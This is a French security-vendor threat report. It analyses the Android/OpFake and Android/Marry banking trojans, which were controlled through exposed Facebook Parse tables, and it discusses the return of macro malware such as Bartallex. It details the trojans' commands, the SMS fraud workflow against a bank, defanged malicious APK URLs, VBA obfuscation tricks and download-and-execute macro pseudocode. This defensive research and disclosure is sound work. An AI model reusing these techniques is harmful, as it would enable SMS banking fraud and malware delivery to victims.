Comportement d'Android/OpFake lorsque l'application est exécutée ou que le service est
démarré en tâche de fond
Partager ce rapport
Points marquants
L'alarme système s'exécute toutes les minutes et vérifie s'il existe de nouvelles
commandes à exécuter tant sur le serveur de contrôle habituel que dans la table
NewTasks de l'outil Facebook Parse. Une fois la commande exécutée, la tâche
est enregistrée dans la table TaskManager pour mettre à jour l'enregistrement
ultérieurement avec la réponse à la tâche :
Alarme
système
Exécution
du récepteur
de contenu
Interrogation de
la table NewTasks
de Parse par
ID d'équipement
Tâche
push
•
•
•
•
•
type: issu de NewTasks
task: type et arguments
hash: identifiant
IMEI: ID d'équipement
response: vide
IMEI == ID
d'équipement
Non
Fin
Oui
Non
Exécution
de la
nouvelle tâche
Si type==
tâche et IMEI==
ID d'équipement
Enregistrement de la
tâche exécutée dans
la table TaskManager
Oui
Fin
Marqueur Intercept
activé/désactivé
Oui
Task==
Intercept
Non
Android/OpFake obtient de nouvelles commandes de la table NewTasks de Facebook Parse.
Points marquants
En plus de la tâche « Intercept » (à activer/désactiver), Android/OpFake peut
exécuter n'importe laquelle des commandes présentes dans la table NewTasks
ou envoyées dans une notification push :
Commandes Android/OpFake
Commande
Action
SMS
Envoie un SMS au numéro, avec le contenu présent dans
l'enregistrement NewTasks.
USSD
Envoie un message USSD à l'aide de l'URI « tel: ».
URL
Ouvre l'URL fournie par l'enregistrement NewTasks dans
le navigateur web par défaut.
New_server
Enregistre localement l'URL du nouveau serveur de contrôle.
Install
Télécharge un fichier APK à partir de l'URL fournie par
l'enregistrement NewTasks sur la carte SD. Si l'appareil est
déjà débridé, le logiciel malveillant utilise les privilèges
administrateur pour installer silencieusement le fichier APK
comme une application système à l'aide de la commande
« pm install ». Si l'appareil n'est pas débridé, le malware
incite l'utilisateur à installer l'application en affichant un
message dans l'interface utilisateur.
Une fois la tâche terminée, l'enregistrement est supprimé de la table NewTasks
pour éviter une nouvelle exécution de la commande.
En cas de réception d'un SMS, Android/OpFake exécute les actions suivantes :
■■
■■
■■
Il enregistre le message dans la table SmsReceiver de Facebook Parse.
Il envoie les données du message au canal de diffusion push « T » de
Facebook Parse.
Si le marqueur Intercept est activé, le logiciel malveillant transmet le
message (ainsi que le solde si le SMS est envoyé par une société comme
MegaFon) au serveur de contrôle habituel.
Partager ce rapport
Points marquants
•
•
•
•
from
content
to: imei
type: service/
other
• is_card: si le contenu
contient cc #
• intype: incoming
Interrogation de la
table TaskManager
par hachage
de tâche
Enregistrement du
message dans la
table SmsReceiver
Enregistrement de
la réponse
(provenant du corps)
dans TaskManager
Oui
Réception d'un
message SMS
Traitement d'un
message SMS
Marqueur
Intercept
activé ?
Oui
Réponse à un
SMS précédent
envoyée ?
imei
phone: provenance
message
type: entrant
Envoi des données
du message au
canal de
diffusion push
« I » de Parse
Fin
Non
Non
•
•
•
•
Non
Origine
contient 088011
ou 000100 ?
Envoi du message
à /bn/
save_message.php
Oui
Extraction et
enregistrement du
solde à partir
du corps
du message
Interaction entre Android/OpFake et Facebook Parse lors de la réception d'un SMS
Android/OpFake vérifie également si le SMS est une réponse à un SMS
précédemment envoyé via la table NewTasks. Si c'est le cas, le contenu
est enregistré dans le champ « response ».
Points marquants
Cheval de Troie bancaire sur mobiles : tables de l'outil Facebook Parse
Notre analyse statique du logiciel malveillant Android/OpFake nous a permis
de découvrir la finalité des données enregistrées dans chaque table de l'outil
Facebook Parse :
Tables de contrôle d'Android/OpFake dans Facebook Parse
Tables Parse
Objectif
NewTasks
Enregistre les nouvelles commandes en attente
d'exécution sur chaque appareil infecté. Une fois la
commande exécutée, l'enregistrement est supprimé.
Exemples de tâches et d'arguments :
■■
■■
Intercept : activé/désactivé et date.
■■
New_server : URL et date.
■■
SmsReceiver
From : origine du SMS (numéro de téléphone/
nom de la société).
■■
Intype : entrant/sortant.
■■
To : ID d'équipement de l'appareil infecté.
■■
■■
Partager ce rapport
Install : ID d'équipement, URL pointant vers
un fichier APK, nom du package de la nouvelle
application et date.
Contient tous les SMS entrants interceptés qui ont été
envoyés à l'appareil infecté :
■■
TaskManager
SMS : origine (ID d'équipement de l'appareil
infecté), destination, contenu, date.
Is_card : vrai/faux si l'appareil contient un numéro
de carte de crédit.
Type : « service » si le message a été envoyé par une
société (p. ex. MegaFon) ou « other » s'il s'agit d'un
autre numéro de téléphone (message personnel).
Stocke toutes les tâches exécutées ainsi que la réponse si
le SMS entrant est une réponse à une tâche précédemment
exécutée (p. ex. une demande de solde d'une carte de
crédit spécifique).
Au total, nous avons identifié cinq comptes exposés par Facebook Parse.
Quatre d'entre eux étaient utilisés par Android/OpFake et le dernier, le
compte D, par Android/Marry au cours de la période d'analyse. Dans le cas
de la table NewTasks, notre analyse statique a révélé qu'une fois la tâche
exécutée, l'enregistrement d'exécution de la commande est supprimé de la
table. Après analyse de la date de création de chaque enregistrement de la
table, nous avons découvert qu'il n'existe pratiquement aucun enregistrement
d'exécution de commande avant le 25 juin. Cela signifie probablement que
toutes les commandes créées à ce moment-là ont été exécutées par les appareils
infectés (ou qu'aucune nouvelle commande n'a été créée). Après le 25 juin, nous
avons trouvé plusieurs enregistrements dans tous les comptes. Nous pouvons
en déduire qu'aucune commande n'a été exécutée puisque les enregistrements
n'ont pas été supprimés. Le logiciel malveillant a sans doute été supprimé de
l'appareil de la victime. Notre analyse de la date de création des enregistrements
dans la table NewTasks de Facebook Parse révèle que les conséquences auraient
pu être plus graves pour les victimes si toutes les commandes en attente depuis
le 25 juin avaient été exécutées par les appareils infectés.
Points marquants
Dates de création des enregistrements
d'exécution de commande NewTasks
14 000
12 000
10 000
8 000
6 000
4 000
2 000
0
13
15
17
19 21 23
Juin 2015
25
27
29
1
Compte A (OpFake)
Compte B (OpFake)
Compte D (Marry)
Compte E (OpFake)
3
5
7
9 11
Juillet 2015
13
Compte C (OpFake)
La commande la plus exécutée dans la table NewTasks est SMS, avec
respectivement 50 000 et 60 000 enregistrements dans les comptes B et E
(Android/OpFake). Le compte D (Android/Marry) ne contenait qu'un petit
nombre d'enregistrements, sans doute parce que la plupart des appareils
infectés étaient en train d'exécuter les tâches au moment de l'analyse :
Types de commandes dans la table NewTasks
70 000
60 000
50 000
40 000
30 000
20 000
10 000
0
Compte A
(OpFake)
Compte B
(OpFake)
Toutes les commandes
SMS
Compte C
(OpFake)
Intercept
Compte D
(Marry)
New_server
Compte E
(OpFake)
Install
Partager ce rapport
Points marquants
Les données révèlent que des milliers de commandes étaient toujours en attente
d'exécution par Android/OpFake tandis qu'Android/Marry avait pu traiter la
plupart des tâches. Les chiffres montrent également que le premier objectif
de ces deux familles de malware est d'envoyer des SMS à des fins de fraude
financière, comme le prouvent les données obtenues dans la table TaskManager.
En ce qui concerne l'exécution de commandes autres que SMS et install, nous en
avons trouvé plusieurs exemples dans la table NewTasks :
■■
New_server :
––hxxp://newwelcome00.ru
––hxxp://newelcome00.ru
■■
Install :
––Android/OpFake distribuant Android/Marry :
■■
hxxp://newwelcome00.ru/appru.apk (marry.adobe.net.threadsync).
■■
hxxp://newwelcome00.ru/app.apk (marry.adobe.net.nightbuid).
––hxxp://notingen.ru/Player.apk (com.adobe.net)
––hxxp://швждаыдлпждв
Pour la table SmsReceiver, le compte E (Android/OpFake) est le plus actif puisqu'il
a intercepté et volé plus de 60 000 SMS entrants, suivi du compte B avec environ
41 000 enregistrements :
Nombre de messages dans la table SmsReceiver
70 000
60 000
50 000
40 000
30 000
20 000
10 000
0
Compte E
(OpFake)
Compte B
(OpFake)
Compte A
(OpFake)
Compte C
(OpFake)
Compte D
(Marry)
Les données indiquent qu'Android/OpFake a collecté près de 170 000 SMS sur
les appareils infectés. La plupart d'entre eux étaient des messages personnels
puisque, comme nous l'avons vu plus haut, les tâches récentes de la table
NewTasks n'avaient pas été exécutées. Cela prouve que les victimes n'ont pas
seulement subi un préjudice financier, mais que leur vie privée a été également
compromise par les cybercriminels.
Partager ce rapport
Points marquants
En analysant le champ is_card dans la table SmsReceiver, nous avons pu découvrir
le nombre de numéros de carte de crédit volés dans les SMS entrants au cours des
deux mois d'analyse :
Nombre de numéros de carte de crédit volés
(pendant la période d'étude de deux mois)
140
120
100
80
60
40
20
0
Compte D
(Marry)
Compte E
(OpFake)
Compte B
(OpFake)
Compte A
(OpFake)
Compte C
(OpFake)
Pour les dates auxquelles les SMS ont été interceptés, tous les comptes ont été
particulièrement actifs entre le 16 et le 24 juin :
Dates de création des enregistrements
d'exécution de commande SmsReceiver
16 000
14 000
12 000
10 000
8 000
6 000
4 000
2 000
0
8
10 12 14 16 18 20 22 24 26 28 30
Juin 2015
Compte A (OpFake)
Compte B (OpFake)
Compte D (Marry)
Compte E (OpFake)
2
4
6
8 10 12 14 16
Juillet 2015
Compte C (OpFake)
Partager ce rapport
Points marquants
En ce qui concerne la table TaskManager, qui contient les tâches exécutées avec,
le cas échéant, la réponse associée, c'est le compte D (Android/Marry) qui a
exécuté le plus grand nombre de tâches :
Types de commandes dans la table TaskManager
21 000
18 000
15 000
12 000
9 000
6 000
3 000
0
Compte A
(OpFake)
Demandes
Compte B
(OpFake)
Réponses
Compte C
(OpFake)
SMS
Compte D
(Marry)
Intercept
Compte E
(OpFake)
Install
En considérant les données fournies par la table NewTasks, le graphique
précédent confirme qu'Android/Marry était très actif au moment où nous
avons accédé aux comptes exposés et que plus de 20 000 commandes ont été
exécutées, pour la plupart des tâches SMS destinées à la fraude financière.
Comme Android/Marry est la famille qui est parvenue à exécuter le plus grand
nombre de tâches (compte tenu du nombre d'enregistrements dans la table
TaskManager), notre analyse s'est concentrée sur les commandes exécutées
ainsi que leurs réponses dans le compte D. L'analyse de la destination des
tâches SMS nous a permis d'identifier les sociétés les plus fréquemment
ciblées par Android/Marry (compte D) :
Partager ce rapport
Points marquants
Nombre de requêtes SMS par société ciblée
5 500
5 000
4 500
4 000
3 500
3 000
2 500
2 000
1 500
1 000
500
Banque 5335
Banque 100
Banque 79037672265
Banque 159
Banque 3116
Banque 7878
Banque 6996
Banque 7494
Banque 10060
Banque 900
0
5 350 SMS ont été envoyés au numéro 900 d'une grande banque d'Europe de
l'Est. Les transactions financières suivantes ont été effectuées par les SMS :
Partager ce rapport
Points marquants
Commandes identifiées dans la table TaskManager
Commande
Format
Réponse
BALANCE/
BALANS/баланс
(Solde)
BALANS <4_derniers_
chiffres>
Solde VISA1234 :
<montant>
INFO/СПРАВКА
(Informations)
СПРАВКА
Liste de cartes
connectées :
VISA1234(ON);
ПЕРЕВОД/
PEREVOD/
ПЕРЕВЕСТИ
(Transfert)
ПЕРЕВОД <origine_
carte_4chiffres>
<destination_
carte_4chiffres> ou
<destination_numéro_
téléphone> <montant>
Pour transférer
<montant> de la carte
VISA1234, le destinataire
<nom> doit envoyer
le code <code> au
numéro 900.
ZAPROS
(Demande)
ZAPROS <numéro_
téléphone> <montant>
Une demande de
transfert de <montant>
à votre carte VISA5678
a été envoyée. Après
confirmation par
l'expéditeur <nom>,
l'argent sera versé sur
votre compte.
TEL/PLATEZ/
PHONE/
POPOLNI/PLATI
(Paiement d'un
compte mobile)
TEL <numéro_téléphone>
<montant>
Pour payer avec la carte
VISA1234 au numéro
<société> <numéro_
téléphone> le montant
<montant>, envoyez
le code <code> au
numéro 900.
Normalement, une transaction financière frauduleuse commence par l'envoi d'une
commande INFO au numéro 900 (à l'aide de la table NewTasks) afin d'obtenir une
liste de cartes connectées. Si une réponse est renvoyée et que la victime possède
une ou plusieurs cartes de crédit activées pour l'envoi de transactions par SMS
(par exemple VISA1234(ON)), le cybercriminel vérifie le solde de chaque carte
de crédit. Si des fonds sont disponibles, une transaction frauduleuse est initiée
pour transférer un montant à une autre carte ou client ou pour payer un compte
de téléphone mobile en créant un enregistrement dans la table NewTasks avec
la destination 900 et les mots Transfert (en russe) ou TEL/PLATI.
En guise de mesure de sécurité, la banque répond en envoyant un code que
l'utilisateur doit envoyer pour confirmer la transaction. Le cybercriminel consulte
la table TaskManager pour obtenir le code et crée un nouvel enregistrement
d'exécution de commande dans la table NewTasks pour envoyer le code
de confirmation au numéro 900. Dans le cas d'une demande (ZAPROS),
le cybercriminel demande un montant de transfert à un numéro de téléphone
qui pourrait être un autre appareil infecté. Si la transaction est confirmée par
l'autre victime, l'argent est transféré au cybercriminel. Comme la demande
de solde (BALANCE) est effectuée pour chaque carte de crédit, elle a été la
demande la plus courante au cours des deux mois d'étude.
Points marquants
Nombre de requêtes par commande de transaction bancaire
5 000
4 000
3 000
2 000
1 000
0
BALANCE/
BALANS/
/баланс (Solde)
INFO/
СПРАВКА
(Informations)
ПЕРЕВОД/
PEREVOD/
ПЕРЕВЕСТИ
(Transfert)
ZAPROS
(Demande)
TEL/PLATEZ/
PHONE/
POPOLNI/PLATI
(Paiement d'un
compte mobile)
Voici les types de réponse de la banque ciblée recensés dans le compte D :
Réponses envoyées par la banque ciblée et enregistrées dans la
table TaskManager
Type
Réponse
Solde
Solde VISA1234 : <montant>
Info
Liste de cartes connectées : VISA1234(ON);
Demande du
numéro de
téléphone
Pour payer avec la carte VISA1234 au numéro
<société> <numéro_téléphone> le montant
<montant>, envoyez le code <code> au numéro 900.
Traitement du
numéro de
téléphone
Paiement VISA1234 <date> <heure> pour les services
<montant> <opérateur> <numéro_téléphone>.
Solde : <montant>
Traitement
du transfert
MAES1234 : Le transfert <montant> au destinataire
de la carte <nom> est traité.
Acceptation
du transfert
VISA1234 : <date/heure> Montant <montant> de
l'expéditeur <nom> reçu. Solde : <montant>
Demande de
transfert
Pour transférer <montant> de la carte VISA1234,
le destinataire de la carte <nom> doit envoyer le
code <code> au numéro 900.
Partager ce rapport
Points marquants
Nous pouvons regrouper le type de réponses par catégorie :
■■
■■
■■
Solde/Informations : Contient des informations générales, par exemple
des cartes de crédit liées au compte bancaire et activées ainsi que le
solde actuel.
Demande de transfert : Les réponses incluent les codes de confirmation
qui doivent être envoyés par l'utilisateur pour finaliser les transactions.
Traitement du transfert : Contient les transactions frauduleuses confirmées.
Nombre de réponses de la banque ciblée ayant
été détectées dans la table TaskManager
700
600
500
400
300
200
100
0
Solde
Informations
Demande
Traitement
Traitement
du numéro
du numéro du transfert
de téléphone de téléphone
Acceptation
du transfert
Demande
de transfert
Ici aussi, le solde est la réponse la plus répandue puisque les cybercriminels
ont obtenu 607 soldes de carte de crédit. En deuxième lieu, on trouve les
informations, répertoriant les cartes de crédit liées à 123 comptes bancaires.
Au total, 141 transactions frauduleuses (paiement par téléphone et transfert)
ont été exécutées au cours des mois de juin et juillet.
Partager ce rapport
Points marquants
Nombre d'utilisateurs affectés par les chevaux de Troie bancaires
sur mobiles
Comme chaque enregistrement est associé à un identifiant d'équipement unique
(IMEI ou android_id), nous avons pu recenser le nombre de victimes concernées
par table et par compte. Il apparaît que le nombre d'utilisateurs susceptibles
d'être affectés si les appareils infectés avaient utilisé la table NewTasks est
beaucoup plus élevé que le nombre d'utilisateurs réellement touchés, si l'on
s'en réfère au nombre d'identifiants d'équipement uniques répertoriés dans
la table TaskManager (tâches exécutées). D'autre part, nous avons constaté
qu'Android/OpFake (comptes A, B, C et E) affiche un taux de réussite plus élevé
dans l'interception des SMS tandis que Android/Marry a affecté un nombre
plus élevé d'utilisateurs en réalisant des transactions frauduleuses via SMS.
Des milliers d'utilisateurs, résidant pour la plupart en Europe de l'Est, ont été
affectés par ces deux chevaux de Troie bancaires sur mobiles au cours des
deux mois de données analysées.
Nombre d'utilisateurs affectés par table
9 000
8 000
7 000
6 000
5 000
4 000
3 000
2 000
1 000
0
Compte A
(OpFake)
Compte B
(OpFake)
NewTasks
SmsReceiver
Compte C
(OpFake)
Compte D
(Marry)
Compte E
(OpFake)
TaskManager
Divulgation responsable
Le 3 août, Siegfried Rasthofer et Eric Bodden ont transmis leurs résultats
à Facebook. Le 6 août, Facebook bloquait tous les comptes Facebook Parse
exposés et utilisés par ces chevaux de Troie.
Cette étude prouve que les chevaux de Troie bancaires sur mobiles constituent
une menace bien réelle qui touche des milliers d'utilisateurs et de nombreuses
sociétés. C'est particulièrement vrai en Europe de l'Est, une région où la fraude
financière par SMS est très active grâce aux applications mobiles malveillantes.
Partager ce rapport
Points marquants
Notre analyse révèle aussi que les transactions frauduleuses ont affecté des
centaines d'utilisateurs au cours des deux mois de notre étude. Enfin, l'analyse
prouve que les auteurs de malware ne sont pas très différents des développeurs
d'applications légitimes dans le sens où ils se concentrent davantage sur les
fonctionnalités de l'application, plutôt que sur la sécurité des données collectées
ou utilisées par le logiciel malveillant. Nous n'aurions pas pu réaliser cette
analyse si les attaquants avaient codé leurs logiciels malveillants en respectant
les bonnes pratiques de sécurité.
Protection
Dans le cas d'applications mobiles légitimes, il n'est guère facile pour l'utilisateur
de savoir si l'application utilise un service BaaS et, si c'est le cas, de déterminer si
la sécurité de ce service a été correctement implémentée. Pour limiter l'exposition
des données personnelles dans les services BaaS, McAfee Labs recommande aux
utilisateurs de se limiter aux applications mobiles bien connues et dont la sécurité
a été confirmée par un organisme indépendant digne de confiance.
En ce qui concerne les chevaux de Troie bancaires sur mobiles, comme l'a révélé
notre analyse des comptes Facebook Parse exposés, les appareils infectés
sont utilisés pour distribuer du malware au moyen d'attaques de phishing qui
envoient des SMS avec le texte « Vous avez 1 message non lu ». Intel Security
recommande de télécharger des applications mobiles uniquement sur des
boutiques d'applications connues, par exemple Google Play, et d'éviter les
applications de sources inconnues. Ce conseil est également valable pour les
SMS et les e-mails. Nous recommandons également d'éviter de débrider les
terminaux mobiles (ou de ne faire qu'après exécution de la tâche exigeant
des privilèges administrateur). En effet, les logiciels malveillants sur mobiles
exploitent souvent l'accès avec privilèges pour installer silencieusement des
applications sans le consentement de l'utilisateur. Enfin, pour protéger les
appareils contre de telles menaces, nous recommandons l'installation d'une
solution de sécurité mobile.
Partager ce rapport
Points marquants
Le retour des logiciels malveillants
diffusés par macro
— Diwakar Dinkar et Rakesh Sharma
Vous souvenez-vous des macros malveillantes ? Dans les années 90, des
menaces telles que Melissa et WM.Concept ont fait des ravages jusqu'à ce que
Microsoft prenne des mesures pour réduire leur efficacité. Après une éclipse de
plusieurs années, les macros malveillantes sont à nouveau en plein essor.
La plupart des particuliers sont à l'abri de telles menaces dans la mesure où
ils utilisent peu les macros. En revanche, les grandes entreprises y ont souvent
recours pour créer facilement des programmes destinés à traiter des tâches
répétitives. Actuellement, les développeurs de logiciels malveillants diffusés par
macro utilisent des techniques d'ingénierie sociale courantes pour s'attaquer
aux entreprises, avec le concours involontaire de leurs utilisateurs.
Fonctionnement des macros
Une macro est un raccourci permettant d'automatiser une tâche fréquemment
exécutée. Il s'agit d'un segment de code incorporé dans un document,
généralement écrit dans le langage de programmation VBA (Visual Basic
for Applications) dans le cas des fichiers Microsoft Office. Lorsque vous
enregistrez une macro, vous créez en réalité un programme dans un langage
de programmation extrêmement puissant.
Une macro peut s'exécuter automatiquement lorsque l'utilisateur effectue une
opération spécifique, telle que lancer Microsoft Word ou ouvrir un document.
Word reconnaît les noms suivants comme des macros automatiques :
■■
AutoExec : Démarre au chargement de Word ou du modèle global.
■■
AutoNew : Démarre lorsque l'utilisateur crée un nouveau document.
■■
AutoOpen : Démarre lorsque l'utilisateur ouvre un document.
■■
AutoClose : Démarre lorsque l'utilisateur ferme un document.
■■
AutoExit : Démarre à la fermeture de Word ou du modèle global.
Les macros légitimes permettent de gagner du temps lors de l'exécution de
tâches simples ou complexes. Toutefois, les auteurs de malware peuvent
truffer les macros de code malveillant susceptible de causer des dommages.
Les macros malveillantes peuvent exister dans tout produit permettant aux
utilisateurs d'écrire des scripts de macro.
Du fait de sa popularité, Microsoft Word est le produit le plus ciblé par les
logiciels malveillants diffusés par macro. Le malware se propage facilement
dans les documents Word parce qu'ils peuvent à la fois contenir du texte
et des macros. Cette combinaison de texte et de macros offre davantage
de contrôle et de souplesse à l'utilisateur, mais ouvre par là même la porte
aux logiciels malveillants diffusés par macro. Les fichiers Excel partagent les
mêmes avantages et inconvénients que les fichiers Word dans la mesure où
les données et les macros associées sont contenues dans un même classeur.
Après avoir pris conscience de l'ampleur de la menace, Microsoft a modifié
la configuration par défaut d'Office pour interdire l'exécution des macros et
ainsi protéger la plupart des utilisateurs. Cependant, de nombreuses grandes
entreprises recourent aux macros, ce qui comporte des risques non négligeables.
Les auteurs de logiciels malveillants en ont tiré profit, ce qui a entraîné le retour
des logiciels malveillants diffusés par macro, sous le couvert de simples ruses
d'ingénierie sociale.
Points marquants
Bref historique des macros malveillantes
Dans les années 90, les logiciels malveillants diffusés par macro, tels que les virus
WM.Concept et Melissa, ont infecté des millions d'utilisateurs de Microsoft Office.
■■
■■
WM.Concept : Le premier virus de macro propagé via Word est apparu en
1995. Pour la première fois, les virus pouvaient résider sur des documents
de traitement de texte et de tableur courants.
Melissa : Ce virus de macro de mass-mailing a été découvert par
McAfee Labs en 1999. Melissa se propage par le biais d'un document
Word ; celui-ci est joint à un e-mail qui invite le destinataire à ouvrir
et à lire la pièce jointe. Le virus s'exécute une fois le document ouvert.
Melissa vérifie si Word 97 ou 2000 est installé. Il désactive certaines
fonctionnalités du logiciel, notamment le message d'avertissement
concernant les macros à l'ouverture suivante du document dans
Word 2000. Il infecte les autres documents Word 97 et 2000 en ajoutant
une nouvelle macro nommée Melissa. Il se propage en envoyant des
copies du document infecté à jusqu'à 50 adresses e-mail en utilisant des
versions compatibles d'Outlook. Si la machine infectée n'est pas équipée
d'Outlook ou ne possède pas de connexion Internet, le virus continue de
se propager localement. On estime que ce virus a infecté jusqu'à 20 %
des ordinateurs de la planète et a battu tous les records de vitesse de
propagation à l'époque.
Pour contrer les logiciels malveillants diffusés par macro, Microsoft a conçu
une étape d'activation des macros, avec une procédure d'autorisation qui sert
de vérification. Office désactive désormais toutes les macros par défaut de
sorte qu'elles ne puissent pas s'exécuter sans l'autorisation de l'utilisateur.
Cette intervention a tempéré les ardeurs des auteurs de logiciels malveillants
diffusés par macro, et l'influence des macros malveillantes a fini par décliner.
La résurgence
Malgré les améliorations apportées par Microsoft, nous avons constaté cette
année que des logiciels malveillants dissimulés dans des macros étaient
utilisés sous la forme de menaces persistantes pour cibler les entreprises.
Une augmentation massive du nombre de logiciels malveillants diffusés par
macro au cours des derniers trimestres indique que les programmes Office
constituent à nouveau des cibles privilégiées.
Nouveaux logiciels malveillants diffusés par macro
Les menaces de macro Office sont
à leur niveau le plus élevé depuis
six ans.
45 000
40 000
35 000
30 000
25 000
20 000
15 000
10 000
5 000
0
4e trim.
2013
Partager ce rapport
1er trim.
2e trim.
3e trim.
2014
4e trim.
1er trim.
2e trim.
2015
3e trim.
Un pic énorme dans les envois d'échantillons à McAfee Labs indique que les logiciels
malveillants diffusés par macro sont à nouveau en plein essor.
Points marquants
Attaques de logiciels malveillants diffusés par macro, par région
1%1%
Amérique du Nord
12 %
Europe
Asie
13 %
44 %
Amérique centrale
Océanie
29 %
Afrique
Amérique du Sud
Les attaques par logiciels malveillants diffusés par macro sont plus nombreuses en
Amérique du Nord, suivie par l'Europe du Nord.
Chaîne d'infection
Les logiciels malveillants diffusés par macro se propagent essentiellement par
le biais de pièces jointes aux messages de spam. Ils exploitent pour ce faire
des campagnes de spam, des pages web compromises et des téléchargements
involontaires. Le mécanisme de distribution a évolué. Les premières campagnes
de spam s'étalaient sur plusieurs jours, voire plusieurs semaines, et utilisaient le
même objet d'e-mail ou le même nom de pièce jointe. Cette uniformité permettait
aux éditeurs de solutions de sécurité de détecter et de neutraliser rapidement les
menaces. Aujourd'hui en revanche, les campagnes de spam exploitant les macros
ont une durée réduite, les objets sont fréquemment modifiés et les pièces jointes
sont élaborées avec soin pour échapper à la détection.
Qui plus est, les infections passent souvent inaperçues parce que le fichier se
comporte comme un document normal, même après s'être acquitté de sa tâche
malveillante. Les macros malveillantes servent généralement de point d'entrée
pour permettre à d'autres malwares de s'introduire dans le système d'une victime
et causer davantage de dommages. Le diagramme suivant représente la chaîne
d'infection habituelle des logiciels malveillants diffusés par macro — du contact
initial à la distribution de la charge active malveillante.
Partager ce rapport
Points marquants
Chaîne d'infection des logiciels malveillants diffusés par macro
Un message de spam
contient un document
Office avec une macro.
L'utilisateur active et
exécute la macro.
Le malware télécharge
d'autres logiciels malveillants
sur le serveur de contrôle.
La chaîne d'infection commence au niveau du message de spam transportant
un fichier .doc ou .zip malveillant en pièce jointe. Le contenu de l'e-mail est
conçu pour duper les utilisateurs à l'aide de techniques d'ingénierie sociale.
Voici quelques exemples illustrant le type de lignes d'objet utilisées à ces fins :
■■
Demande de paiement
■■
Avis important et virement international refusé
■■
Fax-54078429-248035834
■■
Notification de courrier
■■
Curriculum vitae
■■
Demande de paiement de 4478,63
■■
Facture Help Desk US
■■
Facture de vente
■■
Confirmations de donations
■■
Facture alias Hello
Une ligne d'objet efficace peut pousser un utilisateur trop confiant à lire l'e-mail
et à ouvrir la pièce jointe.
Points marquants
Exemples d'e-mails contenant des pièces jointes malveillantes
Lorsqu'un utilisateur ouvre un fichier Word malveillant, Word affiche une
notification de sécurité demandant à l'utilisateur s'il souhaite activer les macros.
Une fois les macros activées, la macro contenant le logiciel malveillant s'exécute.
Le contenu des fichiers Word malveillants varie en fonction des différentes
familles de menaces. L'utilisateur peut voir un document vierge ou être invité
à activer les macros pour afficher le contenu du document. Certains logiciels
malveillants effacent le contenu du document après l'activation de la macro.
Partager ce rapport
Points marquants
Exemples de fichiers Word malveillants
Un utilisateur qui active les macros pour ouvrir un document malveillant permet
l'exécution du logiciel malveillant. Une fois les macros exécutées, le logiciel
malveillant dépose un ou plusieurs fichiers .bat, .vbs ou .ps (PowerShell) sur
le système de la victime, selon qu'il s'agit d'un logiciel malveillant de la famille
de Bartallex, Dridex, Donoff, ou d'un autre programme de téléchargement.
Ces fichiers déposés téléchargent ensuite d'autres logiciels malveillants, tels
qu'Upatre, Vawtrak, Chanitor ou Zbot. McAfee Labs a récemment identifié des
macros qui téléchargent des menaces ou des logiciels de demande de rançon
(ransomware) ciblant les points de vente.
Dissimulation des logiciels malveillants diffusés par macro
Au cours de notre analyse, nous avons découvert beaucoup de code parasite
dans les scripts de macro, ainsi que des API parasites dans les exécutables.
L'ajout de code parasite est généralement utilisé comme technique d'obstruction
à l'ingénierie inverse et pour éviter la détection. Des lignes de code sont
insérées de façon récurrente pour compliquer les investigations et masquer
l'intention malveillante.
Partager ce rapport
Points marquants
Les développeurs de logiciels malveillants diffusés par macro ajoutent du code parasite
pour tenter de compliquer l'ingénierie inverse.
Ce type de dissimulation de code est extrêmement efficace. Nous avons
également rencontré de nombreux cas, non seulement de chaînes malveillantes,
mais également de données parasites corrompues. Les attaquants tentent
généralement de dissimuler les codes de macro en abusant de fonctions
pouvant aller de la simple conversion de caractères, telles que Chr() et ChrW(),
à un chiffrement personnalisé complexe.
Cet exemple illustre l'utilisation d'une fonction de conversion de caractère pour
reconstruire l'URL malveillante afin de télécharger la charge active finale.
Partager ce rapport
Points marquants
Exécution des macros
Un document malveillant commence parfois par la macro Auto_Open(), qui
s'exécute automatiquement chaque fois que le document est ouvert. Auto_Open()
appelle ensuite la méthode principale. Les macros peuvent également contenir
des gestionnaires d'événements Office tels qu'AutoOpen() et Workbook_Open().
Ces gestionnaires d'événements appellent Auto_Open(), qui appelle ensuite la
méthode principale qui distribue la charge active sur la machine de la victime.
En appliquant les trois macros (Auto_Open(), AutoOpen(), et Workbook_Open()) à
un document, les attaquants réduisent le risque d'échec de l'exécution malveillante.
Func AutoOpen()
Auto_Open
End Func
Func Workbook_Open
Auto_Open
End Func
Func Auto_Open()
Main_Func
End Func
Func Main_Func()
Déchiffrement de l'URL
Déchiffrement du chemin du fichier
End Func
Func Download (URL, PATH)
Téléchargement de la charge active finale
End Func
Les attaquants utilisent souvent des macros redondantes pour garantir le succès des attaques.
Lors de l'exécution du logiciel malveillant, un objet XMLHTTP est créé afin
d'échanger des données avec le serveur. Celui-ci envoie des demandes de
connexion au serveur en continu à l'aide de la fonction HTTP Send() jusqu'à ce
qu'il obtienne une réponse. Une fois la connexion établie avec l'URL déchiffrée,
la charge active finale est téléchargée et enregistrée dans l'emplacement
spécifié sur la machine de la victime. Enfin, le fichier binaire téléchargé est
exécuté à l'aide de la commande Shell().
Points marquants
Objet XMLHTTP instancié
Préparation du corps de la demande HTTP
Send()
Non
readyState==4 ?
Oui
Variable=
Réponse
(Fichier chargé)
Enregistrement
du contenu
dans
l'emplacement
spécifié
Exécution du
fichier charge
à l'aide
de Shell()
Ce diagramme illustre la routine de distribution de la charge active du logiciel malveillant.
Comportement de Bartallex
Examinons Bartallex, qui contient trois macros malveillantes incorporées.
Détails de l'extraction de macro dans Bartallex
Les deux premières lignes utilisent une technique de dissimulation classique.
■■
BART212 = "" & "d-up" + "date"
■■
BART2 = Chr(97) + Chr(100) & "" & "o" & "" & "b" & "e" + "ac" & BART212
La division des variables est une pratique couramment utilisée pour contourner
les analyseurs à la recherche de mots clés et autres activités suspectes telles que
les téléchargements de fichier. La fonction Chr renvoie une chaîne contenant
le caractère associé au code de caractère spécifié. Par exemple, Chr(97) est la
lettre a et Chr(100) est la lettre d.
Partager ce rapport
Points marquants
Après avoir supprimé les sauts de ligne et avoir effectué les substitutions,
nous obtenons une chaîne porteuse de sens :
BART2 = "adobeacd-update".
Une autre variante de Bartallex utilise un mécanisme de dissimulation différent pour
dérouter les chercheurs en sécurité.
L'ouverture du document avec les macros activées entraîne l'exécution du fichier
de commandes déposé, qui exécute à son tour le fichier .vbs, lequel télécharge
immédiatement d'autres logiciels malveillants, tels qu'Upatre, Vawtrak et
Chanitor, à partir du serveur distant. (Cliquez ici pour en savoir plus sur Bartallex.)
Logiciel malveillant connecté au serveur de contrôle http:/xx.xxx.254.213 pour
télécharger la charge active, qui semble être un fichier .jpg mais est en réalité un
fichier exécutable malveillant
Partager ce rapport
